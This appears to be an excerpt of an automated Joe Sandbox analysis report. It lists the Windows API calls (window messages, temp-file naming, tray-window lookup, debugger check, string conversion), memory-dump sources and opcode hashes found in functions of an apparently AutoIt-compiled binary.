                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C72615
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C72720
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C7146F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C310E2,?,?,?,00C1100A), ref: 00C2FAD9
                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00C1100A), ref: 00C310E6
                                                                                                                                                                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C1100A), ref: 00C310F5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C310F0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                            • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                            • Opcode ID: d92c178f797e929b427ccad6b90422bf3182c5c47b9377cf0d27bdef3e4cd416
                                                                                                                                                                                                                                                                                            • Instruction ID: 30c9b7897d135dadb914c287f8d5fdee3dab2361cc6def31a50ca7f14116cd4b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d92c178f797e929b427ccad6b90422bf3182c5c47b9377cf0d27bdef3e4cd416
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2E06DB06003908FD3209F24E9053CABBE8AB04345F14892DE886C3651EBB4E884DBA1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C839F0
                                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00C83A05
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                            • String ID: aut
                                                                                                                                                                                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                            • Opcode ID: 288fc47394df452b194e5f66df9c8ee6f4600db2941a793e263487e7d18f4609
                                                                                                                                                                                                                                                                                            • Instruction ID: 77ce259b53536c15787bb3793d2e7a931ded09265c801a61e2e38b1f92a62cc0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 288fc47394df452b194e5f66df9c8ee6f4600db2941a793e263487e7d18f4609
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1D05EF250032867DA20A7649C4EFCF7A6CDB45715F0003A1BA6792091EAB0DA85CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA2E08
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 00CA2E0F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7F292: Sleep.KERNEL32 ref: 00C7F30A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                            • Opcode ID: c1014e85bd6dcfe97601c7e0bf9ef00ef231432759a25271022aaff23f5afa90
                                                                                                                                                                                                                                                                                            • Instruction ID: 0d5e53d67fff29ed8d8ce7a5eca0d17395456cc754d31bf47ded52a3ff1f1084
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1014e85bd6dcfe97601c7e0bf9ef00ef231432759a25271022aaff23f5afa90
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DD0A9313853006AE228A370AC0BFCA3A209B01B04F114825B30BAB5C0C8A068008684
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA2DC8
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CA2DDB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7F292: Sleep.KERNEL32 ref: 00C7F30A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                            • Opcode ID: cd5074b373af9c859e5813a9c55629248192d9c5a336a4aeeed7703ca4e30531
                                                                                                                                                                                                                                                                                            • Instruction ID: 3d49254e58b3fe45eb0c4222e69656d2be9de7b830e6df31915aae2ba65fa145
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd5074b373af9c859e5813a9c55629248192d9c5a336a4aeeed7703ca4e30531
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22D0A935388300A6E228A370AC0BFDA3A209B00B04F114825B30BAB5C0C8A068008680
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C4C213
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C4C221
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C4C27C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 690481504abb40e341cea5dc9935fc17f2bc86d0f288455a0fc2c7a6d3f6a6c0
                                                                                                                                                                                                                                                                                            • Instruction ID: 8559142f4c4c6e70d72f026a269039d24f3425eab5f7b7cfb45f6a21b97ac18e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 690481504abb40e341cea5dc9935fc17f2bc86d0f288455a0fc2c7a6d3f6a6c0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1641D530602206AFDB718FE5C884BAE7BA5BF51720F244169F8659B1B1DBF08E01DB60